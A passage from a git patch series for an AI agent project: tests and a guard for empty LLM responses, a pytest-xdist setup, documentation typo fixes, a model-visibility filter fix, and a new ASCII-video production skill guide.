+            usage=SimpleNamespace(total_tokens=0),
+        )
+
+        with patch(
+            "agent.auxiliary_client.get_text_auxiliary_client",
+            return_value=(fake_client, "default-model"),
+        ):
+            result = asyncio.run(handler(None, _make_sampling_params()))
+
+        assert isinstance(result, ErrorData)
+        assert "empty response" in result.message.lower()
+        assert handler.metrics["errors"] == 1
+
+    def test_none_choices_returns_error(self):
+        """LLM returning choices=None is handled gracefully, not TypeError."""
+        handler = SamplingHandler("nc", {})
+        fake_client = MagicMock()
+        fake_client.chat.completions.create.return_value = SimpleNamespace(
+            choices=None,
+            model="test-model",
+            usage=SimpleNamespace(total_tokens=0),
+        )
+
+        with patch(
+            "agent.auxiliary_client.get_text_auxiliary_client",
+            return_value=(fake_client, "default-model"),
+        ):
+            result = asyncio.run(handler(None, _make_sampling_params()))
+
+        assert isinstance(result, ErrorData)
+        assert "empty response" in result.message.lower()
+        assert handler.metrics["errors"] == 1
+
+    def test_missing_choices_attr_returns_error(self):
+        """LLM response without choices attribute is handled gracefully."""
+        handler = SamplingHandler("mc", {})
+        fake_client = MagicMock()
+        fake_client.chat.completions.create.return_value = SimpleNamespace(
+            model="test-model",
+            usage=SimpleNamespace(total_tokens=0),
+        )
+
+        with patch(
+            "agent.auxiliary_client.get_text_auxiliary_client",
+            return_value=(fake_client, "default-model"),
+        ):
+            result = asyncio.run(handler(None, _make_sampling_params()))
+
+        assert isinstance(result, ErrorData)
+        assert "empty response" in result.message.lower()
+        assert handler.metrics["errors"] == 1
+
 
 # ---------------------------------------------------------------------------
 # 10. Model whitelist
diff --git a/tools/mcp_tool.py b/tools/mcp_tool.py
index deb87d48..b0fc35f7 100644
--- a/tools/mcp_tool.py
+++ b/tools/mcp_tool.py
@@ -538,6 +538,14 @@ class SamplingHandler:
                 f"Sampling LLM call failed: {_sanitize_error(str(exc))}"
             )
 
+        # Guard against empty choices (content filtering, provider errors)
+        if not getattr(response, "choices", None):
+            self.metrics["errors"] += 1
+            return self._error(
+                f"LLM returned empty response (no choices) for server "
+                f"'{self.server_name}'"
+            )
+
         # Track metrics
         choice = response.choices[0]
         self.metrics["requests"] += 1

From 0d96f1991c5c5756af6aa4bbeffec8a88750dc3c Mon Sep 17 00:00:00 2001
From: Brooklyn Nicholson <brooklyn.bb.nicholson@gmail.com>
Date: Mon, 9 Mar 2026 20:47:34 -0500
Subject: [PATCH 026/105] test: parallelize test suite with pytest-xdist

~2min sequential runs were painful. Added pytest-xdist and -n auto
to run across all available cores. Tests already isolate state via
tmp_path fixtures so no changes needed to test code.

Local: 2677 passed in ~30s. CI gets 4 vCPUs on ubuntu-latest.
---
 .github/workflows/tests.yml | 2 +-
 pyproject.toml              | 4 ++--
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml
index 9ebaa7f4..5d8711e1 100644
--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@@ -34,7 +34,7 @@ jobs:
       - name: Run tests
         run: |
           source .venv/bin/activate
-          python -m pytest tests/ -q --ignore=tests/integration --tb=short
+          python -m pytest tests/ -q --ignore=tests/integration --tb=short -n auto
         env:
           # Ensure tests don't accidentally call real APIs
           OPENROUTER_API_KEY: ""
diff --git a/pyproject.toml b/pyproject.toml
index 01bdaf7e..71fb64ed 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -40,7 +40,7 @@ dependencies = [
 [project.optional-dependencies]
 modal = ["swe-rex[modal]>=1.4.0"]
 daytona = ["daytona>=0.148.0"]
-dev = ["pytest", "pytest-asyncio", "mcp>=1.2.0"]
+dev = ["pytest", "pytest-asyncio", "pytest-xdist", "mcp>=1.2.0"]
 messaging = ["python-telegram-bot>=20.0", "discord.py>=2.0", "aiohttp>=3.9.0", "slack-bolt>=1.18.0", "slack-sdk>=3.27.0"]
 cron = ["croniter"]
 slack = ["slack-bolt>=1.18.0", "slack-sdk>=3.27.0"]
@@ -81,4 +81,4 @@ testpaths = ["tests"]
 markers = [
     "integration: marks tests requiring external services (API keys, Modal, etc.)",
 ]
-addopts = "-m 'not integration'"
+addopts = "-m 'not integration' -n auto"

From 1db8609ac99fdaff43c6524a1cac77832be1d857 Mon Sep 17 00:00:00 2001
From: JackTheGit <jack.47@gmail.com>
Date: Tue, 10 Mar 2026 08:10:16 +0000
Subject: [PATCH 027/105] Fix several documentation typos

---
 .../mlops/training/axolotl/references/dataset-formats.md  | 6 +++---
 skills/mlops/training/unsloth/references/llms-full.md     | 8 ++++----
 skills/mlops/training/unsloth/references/llms-txt.md      | 8 ++++----
 3 files changed, 11 insertions(+), 11 deletions(-)

diff --git a/skills/mlops/training/axolotl/references/dataset-formats.md b/skills/mlops/training/axolotl/references/dataset-formats.md
index e09fde4c..aa66b08d 100644
--- a/skills/mlops/training/axolotl/references/dataset-formats.md
+++ b/skills/mlops/training/axolotl/references/dataset-formats.md
@@ -115,7 +115,7 @@ A config for this would look like:
 
 Reference: Pre-Tokenized Dataset Documentation.
 
-We reccomend this approach when you want granular control over the prompt formatting, special tokens, and masking, whilst letting Axolotl handle the tokenization. This is very useful if your dataset has unique prompts that differ across samples and where one single general template wouldn’t suffice.
+We recommend this approach when you want granular control over the prompt formatting, special tokens, and masking, whilst letting Axolotl handle the tokenization. This is very useful if your dataset has unique prompts that differ across samples and where one single general template wouldn’t suffice.
 
 In the example below, you could see that there is no proper structure. At the same time, it’s very flexible as there are no constraints on how your prompt can look.
 
@@ -583,7 +583,7 @@ A config for this would look like:
 
 Reference: Pre-Tokenized Dataset Documentation.
 
-We reccomend this approach when you want granular control over the prompt formatting, special tokens, and masking, whilst letting Axolotl handle the tokenization. This is very useful if your dataset has unique prompts that differ across samples and where one single general template wouldn’t suffice.
+We recommend this approach when you want granular control over the prompt formatting, special tokens, and masking, whilst letting Axolotl handle the tokenization. This is very useful if your dataset has unique prompts that differ across samples and where one single general template wouldn’t suffice.
 
 In the example below, you could see that there is no proper structure. At the same time, it’s very flexible as there are no constraints on how your prompt can look.
 
@@ -796,7 +796,7 @@ A config for this would look like:
 
 Reference: Pre-Tokenized Dataset Documentation.
 
-We reccomend this approach when you want granular control over the prompt formatting, special tokens, and masking, whilst letting Axolotl handle the tokenization. This is very useful if your dataset has unique prompts that differ across samples and where one single general template wouldn’t suffice.
+We recommend this approach when you want granular control over the prompt formatting, special tokens, and masking, whilst letting Axolotl handle the tokenization. This is very useful if your dataset has unique prompts that differ across samples and where one single general template wouldn’t suffice.
 
 In the example below, you could see that there is no proper structure. At the same time, it’s very flexible as there are no constraints on how your prompt can look.
 
diff --git a/skills/mlops/training/unsloth/references/llms-full.md b/skills/mlops/training/unsloth/references/llms-full.md
index 76bc16a3..b0b6b24d 100644
--- a/skills/mlops/training/unsloth/references/llms-full.md
+++ b/skills/mlops/training/unsloth/references/llms-full.md
@@ -1387,7 +1387,7 @@ trainer = SFTTrainer(
 For **advanced installation instructions** or if you see weird errors during installations:
 
 1. Install `torch` and `triton`. Go to <https://pytorch.org> to install it. For example `pip install torch torchvision torchaudio triton`
-2. Confirm if CUDA is installated correctly. Try `nvcc`. If that fails, you need to install `cudatoolkit` or CUDA drivers.
+2. Confirm if CUDA is installed correctly. Try `nvcc`. If that fails, you need to install `cudatoolkit` or CUDA drivers.
 3. Install `xformers` manually. You can try installing `vllm` and seeing if `vllm` succeeds. Check if `xformers` succeeded with `python -m xformers.info` Go to <https://github.com/facebookresearch/xformers>. Another option is to install `flash-attn` for Ampere GPUs.
 4. Double check that your versions of Python, CUDA, CUDNN, `torch`, `triton`, and `xformers` are compatible with one another. The [PyTorch Compatibility Matrix](https://github.com/pytorch/pytorch/blob/main/RELEASE.md#release-compatibility-matrix) may be useful.
 5. Finally, install `bitsandbytes` and check it with `python -m bitsandbytes`
@@ -1824,7 +1824,7 @@ For LLMs, datasets are collections of data that can be used to train our models.
 [datasets-guide](https://docs.unsloth.ai/get-started/fine-tuning-llms-guide/datasets-guide)
 {% endcontent-ref %}
 
-For most of our notebook examples, we utilize the [Alpaca dataset](https://docs.unsloth.ai/basics/tutorial-how-to-finetune-llama-3-and-use-in-ollama#id-6.-alpaca-dataset) however other notebooks like Vision will use different datasets which may need images in the answer ouput as well.
+For most of our notebook examples, we utilize the [Alpaca dataset](https://docs.unsloth.ai/basics/tutorial-how-to-finetune-llama-3-and-use-in-ollama#id-6.-alpaca-dataset) however other notebooks like Vision will use different datasets which may need images in the answer output as well.
 
 ## 4. Understand Training Hyperparameters
 
@@ -13280,7 +13280,7 @@ if __name__ == '__main__':
 ## :detective: Extra Findings & Tips
 
 1. We find using lower KV cache quantization (4bit) seems to degrade generation quality via empirical tests - more tests need to be done, but we suggest using `q8_0` cache quantization. The goal of quantization is to support longer context lengths since the KV cache uses quite a bit of memory.
-2. We found the `down_proj` in this model to be extremely sensitive to quantitation. We had to redo some of our dyanmic quants which used 2bits for `down_proj` and now we use 3bits as the minimum for all these matrices.
+2. We found the `down_proj` in this model to be extremely sensitive to quantitation. We had to redo some of our dynamic quants which used 2bits for `down_proj` and now we use 3bits as the minimum for all these matrices.
 3. Using `llama.cpp` 's Flash Attention backend does result in somewhat faster decoding speeds. Use `-DGGML_CUDA_FA_ALL_QUANTS=ON` when compiling. Note it's also best to set your CUDA architecture as found in <https://developer.nvidia.com/cuda-gpus> to reduce compilation times, then set it via `-DCMAKE_CUDA_ARCHITECTURES="80"`&#x20;
 4. Using a `min_p=0.01`is probably enough. `llama.cpp`defaults to 0.1, which is probably not necessary. Since a temperature of 0.3 is used anyways, we most likely will very unlikely sample low probability tokens, so removing very unlikely tokens is a good idea. DeepSeek recommends 0.0 temperature for coding tasks.
 
@@ -16682,7 +16682,7 @@ Advanced flags which might be useful if you see breaking finetunes, or you want
 
 <table><thead><tr><th width="397.4666748046875">Environment variable</th><th>Purpose</th><th data-hidden></th></tr></thead><tbody><tr><td><code>os.environ["UNSLOTH_RETURN_LOGITS"] = "1"</code></td><td>Forcibly returns logits - useful for evaluation if logits are needed.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_COMPILE_DISABLE"] = "1"</code></td><td>Disables auto compiler. Could be useful to debug incorrect finetune results.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_DISABLE_FAST_GENERATION"] = "1"</code></td><td>Disables fast generation for generic models.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_ENABLE_LOGGING"] = "1"</code></td><td>Enables auto compiler logging - useful to see which functions are compiled or not.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_FORCE_FLOAT32"] = "1"</code></td><td>On float16 machines, use float32 and not float16 mixed precision. Useful for Gemma 3.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_STUDIO_DISABLED"] = "1"</code></td><td>Disables extra features.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_COMPILE_DEBUG"] = "1"</code></td><td>Turns on extremely verbose <code>torch.compile</code>logs.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_COMPILE_MAXIMUM"] = "0"</code></td><td>Enables maximum <code>torch.compile</code>optimizations - not recommended.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_COMPILE_IGNORE_ERRORS"] = "1"</code></td><td>Can turn this off to enable fullgraph parsing.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_FULLGRAPH"] = "0"</code></td><td>Enable <code>torch.compile</code> fullgraph mode</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_DISABLE_AUTO_UPDATES"] = "1"</code></td><td>Forces no updates to <code>unsloth-zoo</code></td><td></td></tr></tbody></table>
 
-Another possiblity is maybe the model uploads we uploaded are corrupted, but unlikely. Try the following:
+Another possibility is maybe the model uploads we uploaded are corrupted, but unlikely. Try the following:
 
 ```python
 model, tokenizer = FastVisionModel.from_pretrained(
diff --git a/skills/mlops/training/unsloth/references/llms-txt.md b/skills/mlops/training/unsloth/references/llms-txt.md
index ed99f5bb..c5895c7c 100644
--- a/skills/mlops/training/unsloth/references/llms-txt.md
+++ b/skills/mlops/training/unsloth/references/llms-txt.md
@@ -855,7 +855,7 @@ To run Unsloth directly on Windows:
 For **advanced installation instructions** or if you see weird errors during installations:
 
 1. Install `torch` and `triton`. Go to <https://pytorch.org> to install it. For example `pip install torch torchvision torchaudio triton`
-2. Confirm if CUDA is installated correctly. Try `nvcc`. If that fails, you need to install `cudatoolkit` or CUDA drivers.
+2. Confirm if CUDA is installed correctly. Try `nvcc`. If that fails, you need to install `cudatoolkit` or CUDA drivers.
 3. Install `xformers` manually. You can try installing `vllm` and seeing if `vllm` succeeds. Check if `xformers` succeeded with `python -m xformers.info` Go to <https://github.com/facebookresearch/xformers>. Another option is to install `flash-attn` for Ampere GPUs.
 4. Double check that your versions of Python, CUDA, CUDNN, `torch`, `triton`, and `xformers` are compatible with one another. The [PyTorch Compatibility Matrix](https://github.com/pytorch/pytorch/blob/main/RELEASE.md#release-compatibility-matrix) may be useful.
 5. Finally, install `bitsandbytes` and check it with `python -m bitsandbytes`
@@ -2994,7 +2994,7 @@ if __name__ == '__main__':
 ## :detective: Extra Findings & Tips
 
 1. We find using lower KV cache quantization (4bit) seems to degrade generation quality via empirical tests - more tests need to be done, but we suggest using `q8_0` cache quantization. The goal of quantization is to support longer context lengths since the KV cache uses quite a bit of memory.
-2. We found the `down_proj` in this model to be extremely sensitive to quantitation. We had to redo some of our dyanmic quants which used 2bits for `down_proj` and now we use 3bits as the minimum for all these matrices.
+2. We found the `down_proj` in this model to be extremely sensitive to quantitation. We had to redo some of our dynamic quants which used 2bits for `down_proj` and now we use 3bits as the minimum for all these matrices.
 3. Using `llama.cpp` 's Flash Attention backend does result in somewhat faster decoding speeds. Use `-DGGML_CUDA_FA_ALL_QUANTS=ON` when compiling. Note it's also best to set your CUDA architecture as found in <https://developer.nvidia.com/cuda-gpus> to reduce compilation times, then set it via `-DCMAKE_CUDA_ARCHITECTURES="80"`&#x20;
 4. Using a `min_p=0.01`is probably enough. `llama.cpp`defaults to 0.1, which is probably not necessary. Since a temperature of 0.3 is used anyways, we most likely will very unlikely sample low probability tokens, so removing very unlikely tokens is a good idea. DeepSeek recommends 0.0 temperature for coding tasks.
 
@@ -3509,7 +3509,7 @@ Advanced flags which might be useful if you see breaking finetunes, or you want
 
 <table><thead><tr><th width="397.4666748046875">Environment variable</th><th>Purpose</th><th data-hidden></th></tr></thead><tbody><tr><td><code>os.environ["UNSLOTH_RETURN_LOGITS"] = "1"</code></td><td>Forcibly returns logits - useful for evaluation if logits are needed.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_COMPILE_DISABLE"] = "1"</code></td><td>Disables auto compiler. Could be useful to debug incorrect finetune results.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_DISABLE_FAST_GENERATION"] = "1"</code></td><td>Disables fast generation for generic models.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_ENABLE_LOGGING"] = "1"</code></td><td>Enables auto compiler logging - useful to see which functions are compiled or not.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_FORCE_FLOAT32"] = "1"</code></td><td>On float16 machines, use float32 and not float16 mixed precision. Useful for Gemma 3.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_STUDIO_DISABLED"] = "1"</code></td><td>Disables extra features.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_COMPILE_DEBUG"] = "1"</code></td><td>Turns on extremely verbose <code>torch.compile</code>logs.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_COMPILE_MAXIMUM"] = "0"</code></td><td>Enables maximum <code>torch.compile</code>optimizations - not recommended.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_COMPILE_IGNORE_ERRORS"] = "1"</code></td><td>Can turn this off to enable fullgraph parsing.</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_FULLGRAPH"] = "0"</code></td><td>Enable <code>torch.compile</code> fullgraph mode</td><td></td></tr><tr><td><code>os.environ["UNSLOTH_DISABLE_AUTO_UPDATES"] = "1"</code></td><td>Forces no updates to <code>unsloth-zoo</code></td><td></td></tr></tbody></table>
 
-Another possiblity is maybe the model uploads we uploaded are corrupted, but unlikely. Try the following:
+Another possibility is maybe the model uploads we uploaded are corrupted, but unlikely. Try the following:
 
 **Examples:**
 
@@ -9120,7 +9120,7 @@ For LLMs, datasets are collections of data that can be used to train our models.
 [datasets-guide](https://docs.unsloth.ai/get-started/fine-tuning-llms-guide/datasets-guide)
 {% endcontent-ref %}
 
-For most of our notebook examples, we utilize the [Alpaca dataset](https://docs.unsloth.ai/basics/tutorial-how-to-finetune-llama-3-and-use-in-ollama#id-6.-alpaca-dataset) however other notebooks like Vision will use different datasets which may need images in the answer ouput as well.
+For most of our notebook examples, we utilize the [Alpaca dataset](https://docs.unsloth.ai/basics/tutorial-how-to-finetune-llama-3-and-use-in-ollama#id-6.-alpaca-dataset) however other notebooks like Vision will use different datasets which may need images in the answer output as well.
 
 ## 4. Understand Training Hyperparameters
 

From ca23875575c229569f5ca6b3aa33f6bcd3c808e4 Mon Sep 17 00:00:00 2001
From: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
Date: Mon, 9 Mar 2026 17:14:04 +0300
Subject: [PATCH 028/105] fix: unify visibility filter in codex model discovery

_fetch_models_from_api checked for "hide" while _read_cache_models
checked for "hidden", causing models hidden by the API to still
appear when loaded from cache. Both now accept either value.
---
 hermes_cli/codex_models.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/hermes_cli/codex_models.py b/hermes_cli/codex_models.py
index bc7e8525..9fe34671 100644
--- a/hermes_cli/codex_models.py
+++ b/hermes_cli/codex_models.py
@@ -47,7 +47,7 @@ def _fetch_models_from_api(access_token: str) -> List[str]:
         if item.get("supported_in_api") is False:
             continue
         visibility = item.get("visibility", "")
-        if isinstance(visibility, str) and visibility.strip().lower() == "hidden":
+        if isinstance(visibility, str) and visibility.strip().lower() in ("hide", "hidden"):
             continue
         priority = item.get("priority")
         rank = int(priority) if isinstance(priority, (int, float)) else 10_000
@@ -97,7 +97,7 @@ def _read_cache_models(codex_home: Path) -> List[str]:
             if item.get("supported_in_api") is False:
                 continue
             visibility = item.get("visibility")
-            if isinstance(visibility, str) and visibility.strip().lower() == "hidden":
+            if isinstance(visibility, str) and visibility.strip().lower() in ("hide", "hidden"):
                 continue
             priority = item.get("priority")
             rank = int(priority) if isinstance(priority, (int, float)) else 10_000

From c358af7861a07832de67ff2049e9d8415945280c Mon Sep 17 00:00:00 2001
From: SHL0MS <131039422+SHL0MS@users.noreply.github.com>
Date: Tue, 10 Mar 2026 15:54:38 -0400
Subject: [PATCH 029/105] Add ASCII video skill to creative category

---
 skills/creative/ascii-video/SKILL.md          |  250 ++++
 .../ascii-video/references/architecture.md    |  528 +++++++++
 .../ascii-video/references/composition.md     |  476 ++++++++
 .../ascii-video/references/effects.md         |  893 ++++++++++++++
 .../creative/ascii-video/references/inputs.md |  407 +++++++
 .../ascii-video/references/optimization.md    |  435 +++++++
 .../creative/ascii-video/references/scenes.md |  382 ++++++
 .../ascii-video/references/shaders.md         | 1027 +++++++++++++++++
 .../ascii-video/references/troubleshooting.md |  331 ++++++
 9 files changed, 4729 insertions(+)
 create mode 100644 skills/creative/ascii-video/SKILL.md
 create mode 100644 skills/creative/ascii-video/references/architecture.md
 create mode 100644 skills/creative/ascii-video/references/composition.md
 create mode 100644 skills/creative/ascii-video/references/effects.md
 create mode 100644 skills/creative/ascii-video/references/inputs.md
 create mode 100644 skills/creative/ascii-video/references/optimization.md
 create mode 100644 skills/creative/ascii-video/references/scenes.md
 create mode 100644 skills/creative/ascii-video/references/shaders.md
 create mode 100644 skills/creative/ascii-video/references/troubleshooting.md

diff --git a/skills/creative/ascii-video/SKILL.md b/skills/creative/ascii-video/SKILL.md
new file mode 100644
index 00000000..8c686bf2
--- /dev/null
+++ b/skills/creative/ascii-video/SKILL.md
@@ -0,0 +1,250 @@
+---
+name: ascii-video
+description: "Production pipeline for ASCII art video — any format. Converts video/audio/images/generative input into colored ASCII character video output (MP4, GIF, image sequence). Covers: video-to-ASCII conversion, audio-reactive music visualizers, generative ASCII art animations, hybrid video+audio reactive, text/lyrics overlays, real-time terminal rendering. Use when users request: ASCII video, text art video, terminal-style video, character art animation, retro text visualization, audio visualizer in ASCII, converting video to ASCII art, matrix-style effects, or any animated ASCII output."
+---
+
+# ASCII Video Production Pipeline
+
+Full production pipeline for rendering any content as colored ASCII character video.
+
+## Modes
+
+| Mode | Input | Output | Read |
+|------|-------|--------|------|
+| **Video-to-ASCII** | Video file | ASCII recreation of source footage | `references/inputs.md` § Video Sampling |
+| **Audio-reactive** | Audio file | Generative visuals driven by audio features | `references/inputs.md` § Audio Analysis |
+| **Generative** | None (or seed params) | Procedural ASCII animation | `references/effects.md` |
+| **Hybrid** | Video + audio | ASCII video with audio-reactive overlays | Both input refs |
+| **Lyrics/text** | Audio + text/SRT | Timed text with visual effects | `references/inputs.md` § Text/Lyrics |
+| **TTS narration** | Text quotes + TTS API | Narrated testimonial/quote video with typed text | `references/inputs.md` § TTS Integration |
+
+## Stack
+
+Single self-contained Python script per project. No GPU.
+
+| Layer | Tool | Purpose |
+|-------|------|---------|
+| Core | Python 3.10+, NumPy | Math, array ops, vectorized effects |
+| Signal | SciPy | FFT, peak detection (audio modes only) |
+| Imaging | Pillow (PIL) | Font rasterization, video frame decoding, image I/O |
+| Video I/O | ffmpeg (CLI) | Decode input, encode output segments, mux audio, mix tracks |
+| Parallel | concurrent.futures / multiprocessing | N workers for batch/clip rendering |
+| TTS | ElevenLabs API (or similar) | Generate narration clips for quote/testimonial videos |
+| Optional | OpenCV | Video frame sampling, edge detection, optical flow |
+
+## Pipeline Architecture (v2)
+
+Every mode follows the same 6-stage pipeline. See `references/architecture.md` for implementation details, `references/scenes.md` for scene protocol, and `references/composition.md` for multi-grid composition and tonemap.
+
+```
+┌─────────┐   ┌──────────┐   ┌───────────┐   ┌──────────┐   ┌─────────┐   ┌────────┐
+│ 1.INPUT  │→│ 2.ANALYZE │→│ 3.SCENE_FN │→│ 4.TONEMAP │→│ 5.SHADE  │→│ 6.ENCODE│
+│ load src │  │ features  │  │ → canvas   │  │ normalize │  │ post-fx  │  │ → video │
+└─────────┘   └──────────┘   └───────────┘   └──────────┘   └─────────┘   └────────┘
+```
+
+1. **INPUT** — Load/decode source material (video frames, audio samples, images, or nothing)
+2. **ANALYZE** — Extract per-frame features (audio bands, video luminance/edges, motion vectors)
+3. **SCENE_FN** — Scene function renders directly to pixel canvas (`uint8 H,W,3`). May internally compose multiple character grids via `_render_vf()` + pixel blend modes. See `references/composition.md`
+4. **TONEMAP** — Percentile-based adaptive brightness normalization with per-scene gamma. Replaces linear brightness multipliers. See `references/composition.md` § Adaptive Tonemap
+5. **SHADE** — Apply post-processing `ShaderChain` + `FeedbackBuffer`. See `references/shaders.md`
+6. **ENCODE** — Pipe raw RGB frames to ffmpeg for H.264/GIF encoding
+
+## Creative Direction
+
+**Every project should look and feel different.** The references provide a vocabulary of building blocks — don't copy them verbatim. Combine, modify, and invent.
+
+### Aesthetic Dimensions to Vary
+
+| Dimension | Options | Reference |
+|-----------|---------|-----------|
+| **Character palette** | Density ramps, block elements, symbols, scripts (katakana, Greek, runes, braille), dots, project-specific | `architecture.md` § Character Palettes |
+| **Color strategy** | HSV (angle/distance/time/value mapped), discrete RGB palettes, monochrome, complementary, triadic, temperature | `architecture.md` § Color System |
+| **Color tint** | Warm, cool, amber, matrix green, neon pink, sepia, ice, blood, void, sunset | `shaders.md` § Color Grade |
+| **Background texture** | Sine fields, noise, smooth noise, cellular/voronoi, video source | `effects.md` § Background Fills |
+| **Primary effects** | Rings, spirals, tunnel, vortex, waves, interference, aurora, ripple, fire | `effects.md` § Radial / Wave / Fire |
+| **Particles** | Energy sparks, snow, rain, bubbles, runes, binary data, orbits, gravity wells | `effects.md` § Particle Systems |
+| **Shader mood** | Retro CRT, clean modern, glitch art, cinematic, dreamy, harsh industrial, psychedelic | `shaders.md` § Design Philosophy |
+| **Grid density** | xs(8px) through xxl(40px), mixed per layer | `architecture.md` § Grid System |
+| **Font** | Menlo, Monaco, Courier, SF Mono, JetBrains Mono, Fira Code, IBM Plex | `architecture.md` § Font Selection |
+| **Mirror mode** | None, horizontal, vertical, quad, diagonal, kaleidoscope | `shaders.md` § Mirror Effects |
+| **Transition style** | Crossfade, wipe (directional/radial), dissolve, glitch cut | `shaders.md` § Transitions |
+
+### Per-Section Variation
+
+Never use the same config for the entire video. For each section/scene/quote:
+- Choose a **different background effect** (or compose 2-3)
+- Choose a **different character palette** (match the mood)
+- Choose a **different color strategy** (or at minimum a different hue)
+- Vary **shader intensity** (more bloom during peaks, more grain during quiet)
+- Use **different particle types** if particles are active
+
+### Project-Specific Invention
+
+For every project, invent at least one of:
+- A custom character palette matching the theme
+- A custom background effect (combine/modify existing ones)
+- A custom color palette (discrete RGB set matching the brand/mood)
+- A custom particle character set
+
+## Workflow
+
+### Step 1: Determine Mode and Gather Requirements
+
+Establish with user:
+- **Input source** — file path, format, duration
+- **Mode** — which of the 6 modes above
+- **Sections** — time-mapped style changes (timestamps → effect names)
+- **Resolution** — default 1920x1080 @ 24fps; GIFs typically 640x360 @ 15fps
+- **Style direction** — dense/sparse, bright/dark, chaotic/minimal, color palette
+- **Text/branding** — easter eggs, overlays, credits, themed character sets
+- **Output format** — MP4 (default), GIF, PNG sequence
+
+### Step 2: Detect Hardware and Set Quality
+
+Before building the script, detect the user's hardware and set appropriate defaults. See `references/optimization.md` § Hardware Detection.
+
+```python
+hw = detect_hardware()
+profile = quality_profile(hw, target_duration, user_quality_pref)
+log(f"Hardware: {hw['cpu_count']} cores, {hw['mem_gb']:.1f}GB RAM")
+log(f"Render: {profile['vw']}x{profile['vh']} @{profile['fps']}fps, {profile['workers']} workers")
+```
+
+Never hardcode worker counts, resolution, or CRF. Always detect and adapt.
+
+### Step 3: Build the Script
+
+Write as a single Python file. Major components:
+
+1. **Hardware detection + quality profile** — see `references/optimization.md`
+2. **Input loader** — mode-dependent; see `references/inputs.md`
+3. **Feature analyzer** — audio FFT, video luminance, or pass-through
+4. **Grid + renderer** — multi-density character grids with bitmap cache; `_render_vf()` helper for value/hue field → canvas
+5. **Character palettes** — multiple palettes chosen per project theme; see `references/architecture.md`
+6. **Color system** — HSV + discrete RGB palettes as needed; see `references/architecture.md`
+7. **Scene functions** — each returns `canvas (uint8 H,W,3)` directly. May compose multiple grids internally via pixel blend modes. See `references/scenes.md` + `references/composition.md`
+8. **Tonemap** — adaptive brightness normalization with per-scene gamma; see `references/composition.md`
+9. **Shader pipeline** — `ShaderChain` + `FeedbackBuffer` per-section config; see `references/shaders.md`
+10. **Scene table + dispatcher** — maps time ranges to scene functions + shader/feedback configs; see `references/scenes.md`
+11. **Parallel encoder** — N-worker batch clip rendering with ffmpeg pipes
+12. **Main** — orchestrate full pipeline
+
+### Step 4: Handle Critical Bugs
+
+#### Font Cell Height (macOS Pillow)
+
+`textbbox()` returns wrong height. Use `font.getmetrics()`:
+
+```python
+ascent, descent = font.getmetrics()
+cell_height = ascent + descent  # correct
+```
+
+#### ffmpeg Pipe Deadlock
+
+Never use `stderr=subprocess.PIPE` with long-running ffmpeg. Redirect to file:
+
+```python
+stderr_fh = open(err_path, "w")
+pipe = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.DEVNULL, stderr=stderr_fh)
+```
+
+#### Brightness — Use `tonemap()`, Not Linear Multipliers
+
+ASCII on black is inherently dark. This is the #1 visual issue. **Do NOT use linear `* N` brightness multipliers** — they clip highlights and wash out the image. Instead, use the **adaptive tonemap** function from `references/composition.md`:
+
+```python
+def tonemap(canvas, gamma=0.75):
+    """Percentile-based adaptive normalization + gamma. Replaces all brightness multipliers."""
+    f = canvas.astype(np.float32)
+    lo = np.percentile(f, 1)          # black point (1st percentile)
+    hi = np.percentile(f, 99.5)       # white point (99.5th percentile)
+    if hi - lo < 1: hi = lo + 1
+    f = (f - lo) / (hi - lo)
+    f = np.clip(f, 0, 1) ** gamma     # gamma < 1 = brighter mids
+    return (f * 255).astype(np.uint8)
+```
+
+Pipeline ordering: `scene_fn() → tonemap() → FeedbackBuffer → ShaderChain → ffmpeg`
+
+Per-scene gamma overrides for destructive effects:
+- Default: `gamma=0.75`
+- Solarize scenes: `gamma=0.55` (solarize darkens above-threshold pixels)
+- Posterize scenes: `gamma=0.50` (quantization loses brightness range)
+- Already-bright scenes: `gamma=0.85`
+
+Additional brightness best practices:
+- Dense animated backgrounds — never flat black, always fill the grid
+- Vignette minimum clamped to 0.15 (not 0.12)
+- Bloom threshold lowered to 130 (not 170) so more pixels contribute to glow
+- Use `screen` blend mode (not `overlay`) when compositing dark ASCII layers — overlay squares dark values: `2 * 0.12 * 0.12 = 0.03`
+
+#### Font Compatibility
+
+Not all Unicode characters render in all fonts. Validate palettes at init:
+```python
+for c in palette:
+    img = Image.new("L", (20, 20), 0)
+    ImageDraw.Draw(img).text((0, 0), c, fill=255, font=font)
+    if np.array(img).max() == 0:
+        log(f"WARNING: char '{c}' (U+{ord(c):04X}) not in font, removing from palette")
+```
+
+### Step 4b: Per-Clip Architecture (for segmented videos)
+
+When the video has discrete segments (quotes, scenes, chapters), render each as a separate clip file. This enables:
+- Re-rendering individual clips without touching the rest (`--clip q05`)
+- Faster iteration on specific sections
+- Easy reordering or trimming in post
+
+```python
+segments = [
+    {"id": "intro", "start": 0.0, "end": 5.0, "type": "intro"},
+    {"id": "q00", "start": 5.0, "end": 12.0, "type": "quote", "qi": 0, ...},
+    {"id": "t00", "start": 12.0, "end": 13.5, "type": "transition", ...},
+    {"id": "outro", "start": 208.0, "end": 211.6, "type": "outro"},
+]
+
